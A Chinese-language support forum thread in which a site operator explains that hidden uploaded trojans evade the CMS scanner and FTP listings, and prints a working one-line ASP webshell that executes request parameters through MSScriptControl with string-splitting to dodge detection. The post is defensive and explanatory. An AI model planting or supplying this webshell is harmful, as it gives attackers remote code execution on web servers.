账号通
    

账号  

密码  

2121

查看

2

回复
主题:木马总是杀不干净的原因 [收藏主题]  
sqldebug 当前离线

12

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:680 分
登录次数:80 次
注册时间:2006/8/12
最后登录:2012/11/9
sqldebug 发表于:2009/10/1 18:05:00   | 只看该作者 查看该作者主题 楼主 
科汛在线网校系统

早上刚处理完被黑的网站,下午又被搞,研究了半天发现原因所在了:

 

传上来的木马有两种,隐藏的和非隐藏的,非隐藏的很容易通过科讯的木马扫描查出来,而隐藏的不行,就算是用ftp客户端,很多也是默认不显示隐藏文件的。隐藏的木马如下:

 

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

漏洞资料如下:

http://www.bitscn.com/network/security/200607/35656.html

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
sfengttt 当前离线

96

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:1192 分
登录次数:126 次
注册时间:2007/7/29
最后登录:2017/3/23
sfengttt 发表于:2009/10/1 20:51:00   | 只看该作者 查看该作者主题 沙发 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
dengcc 当前离线

208

主题

3

广播

0

粉丝
添加关注
级别:二年级

用户积分:2003 分
登录次数:189 次
注册时间:2009/8/17
最后登录:2015/5/18
dengcc 发表于:2009/10/1 18:33:00   | 只看该作者 查看该作者主题 藤椅 
科汛在线考试系统(NET)
技术帖,我看不懂,但可以顶起来让大家关注!
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.07813秒 powered by KesionCMS 9.0